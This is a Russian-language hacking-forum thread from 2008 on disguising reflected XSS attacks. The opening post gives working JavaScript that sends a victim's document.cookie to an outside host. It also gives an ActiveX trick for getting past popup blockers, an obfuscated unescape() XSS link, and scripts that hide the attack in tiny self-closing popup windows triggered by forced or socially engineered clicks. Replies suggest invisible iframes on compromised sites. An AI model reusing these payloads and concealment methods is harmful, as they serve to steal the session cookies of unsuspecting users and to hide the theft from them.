Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Маскировка пассивных Xss (https://forum.antichat.xyz/showthread.php?t=66670)

ZET36 07.04.2008 18:16

Маскировка пассивных Xss
 
И так разработкой данного метода маскировки меня сподвигла
огромная актуальность пассивных xss уязвимостей . как минимум каждый 2рой сайт в рунете уязвим

но вот загвоздка этих атак заключается в там что не каждый юзер пойдёт по ссылке типа

Код:

http://irc.run.net/cgi-bin/irc.cgi?item=fmain&interface=ie&style=gothic<script>img = new Image(); img.src = "http://antichat.org/s/red.gif?"+document.cookie;</script>
да и перенапрвление не даёт должной беспаливности так как оказываясь перенаправленным юзер конешно увидит url .
идеальным бы казалось спрятать страницу с хсс в невидимый фрэйм. но вот куки с него неидут так как фрэйм находится на другом домене

остались всплывающие окна. конешно не идеальный вариант маскировки но всёрвно неплохой (например заходит жертва на нашу страницу вылетает маленькое окошко 1 на 1 . автоматом он думает что это реклама и закрывает его темболее в следующих скриптах приведён пример самостоятельного закрытия этого окошка при передаче куков)


но есть одно НО во всех браузерах есть предупреждение всплывающих окон а у некоторых они отключены вообще

в принципе обход блокировки сплывающих окон в ie можно обойти с помощью ActiveX

Код:

<object id=x classid=clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A width=1 height=1 align=middle>
<PARAM NAME=ActivateApplets VALUE=1><PARAM NAME=ActivateActiveXControls VALUE=1></object>
<SCRIPT>

function shellscript()
{
var xss_site = unescape("%68%74%74%70%3A%2F%2F%69%72%63%2E%6B%67%74%73%2E%72%75%2F%63%67%69%2D%62%69%6E%2F%69%72%63%2E%63%67%69%3F%69%74%65%6D%3D%66%6D%61%69%6E%26%69%6E%74%65%72%66%61%63%65%3D%69%65%26%73%74%79%6C%65%3D%67%6F%74%68%69%63%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E");

msgWindow=open(xss_site,"rastabzc","width=1,height=1'");
setTimeout('  msgWindow.close()  ',4000)
}

function main()
{
        x.DOM.Script.execScript(shellscript.toString());
        x.DOM.Script.setTimeout("shellscript()");
}

if (window.rasta!=true) {
        setTimeout('  main()  ',100)
}
</script>

где в переменной xss_site зашифрованным в unescape содержится ссылка с xss (просто взял в пример алерт
http://irc.kgts.ru/cgi-bin/irc.cgi?item=fmain&interface=ie&style=gothic"><scr ipt>alert(1)</script>)

но вот в Опере и Лисе ActiveX вообще нету. что же делать?

наверно вы обратили внимание что при механическом клике на ссылку никакой блокировки не всплывает. а вот если функция её вызывает клик автоматом
скажем так

Код:

<form name="f">
<input type="button" name="n" onClick="zet()">
</form>

<script>
document.f.n.click();

function zet()
{
msgWindow=open("http://www.yandex.ru/","rastabzc","width=1,height=1'");
}
</script>

то блокировка всёравно как не жалко присутствует

остаётся только как можно хитрее поступить с механическим кликом (тоесть заставить жертву не только зайти на страницу но ещё и щёлкнуть по ней мышкой)

прибегнем немножко к социнженерии

Код:

<body onclick='zet()'>

<script>
function zet()
{
var xss_site = unescape("%68%74%74%70%3A%2F%2F%69%72%63%2E%6B%67%74%73%2E%72%75%2F%63%67%69%2D%62%69%6E%2F%69%72%63%2E%63%67%69%3F%69%74%65%6D%3D%66%6D%61%69%6E%26%69%6E%74%65%72%66%61%63%65%3D%69%65%26%73%74%79%6C%65%3D%67%6F%74%68%69%63%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E");
msgWindow=open(xss_site,"rastabzc","width=1,height=1'");
setTimeout('  msgWindow.close()  ',4000);
}
</script>
</body>

помимо этого кода в странице должно быть чтонибуть интересное что бы заставило нажать жертву на кнопку


Но я неочень люблю Соц инженерию (особенно представляться блондинкой с большой грудью просящей посмотреть на фотки.exe или что то в этом роде). хотелось бы сделать атаку как можно автоматизированее

и вот меня осенило что если сделать это механическое нажатие вынужденным ( ну тоесть когда на странице выскакивает алерт или ошибка мы сначало должны его закрыть а потом уже страницу. (закрыть сразу страницу с открытм алертом неполучиться) и собственно что бы её закрыть мы должны по ней щёлкнуть мышью)

вот вам пример вынужденного механического нажатия. кто поможет реализовать этот метод буду очень благодарен
кому интересно прошу развивать тему

~Real F@ck!~ 07.04.2008 18:20

был какой то сайт, там вводиш урл пассивки, он тебе даёт урл переадресации с ихнего сайта на эту пассивку, то есть пассивки в урл незаметно, ну можно правдо определить по урлу на этот сайт.

ZET36 07.04.2008 18:36

Цитата:

Сообщение от ~Real F@ck!~
был какой то сайт, там вводиш урл пассивки, он тебе даёт урл переадресации с ихнего сайта на эту пассивку, то есть пассивки в урл незаметно, ну можно правдо определить по урлу на этот сайт.

что то непонимаю как такое можно реализовать, простая переадресация всёравно выкидывает юзера на страницу с хсс где он обнаружит что то неладное.

+toxa+ 07.04.2008 18:41

ИМХО самое актуальное - это вставлять xss в невидимый ифрейм на поломанном сайте и кинуть ссылку недругу. Так и урла не видно, и можно xss через POST сделать

ZET36 07.04.2008 18:47

Цитата:

Сообщение от +toxa+
ИМХО самое актуальное - это вставлять xss в невидимый ифрейм на поломанном сайте и кинуть ссылку недругу. Так и урла не видно, и можно xss через POST сделать

авторизованные куки через ифрэйм как не жаль не будут ийти так как страница с фреймом находится на другом домене.

можеш сам проверить например вставь в фрэйм сайт где у тебя запомнен пароль. ну тоесть при обычном вызове этого сайта ты будеш авторизирован а через фрэйм нет

ettee 07.04.2008 22:13

~Real F@ck!~, https://forum.antichat.ru/thread43786.html
ZET36, почему я не верю?
Перестаньте нести дезинформацию в народ.


Время: 09:04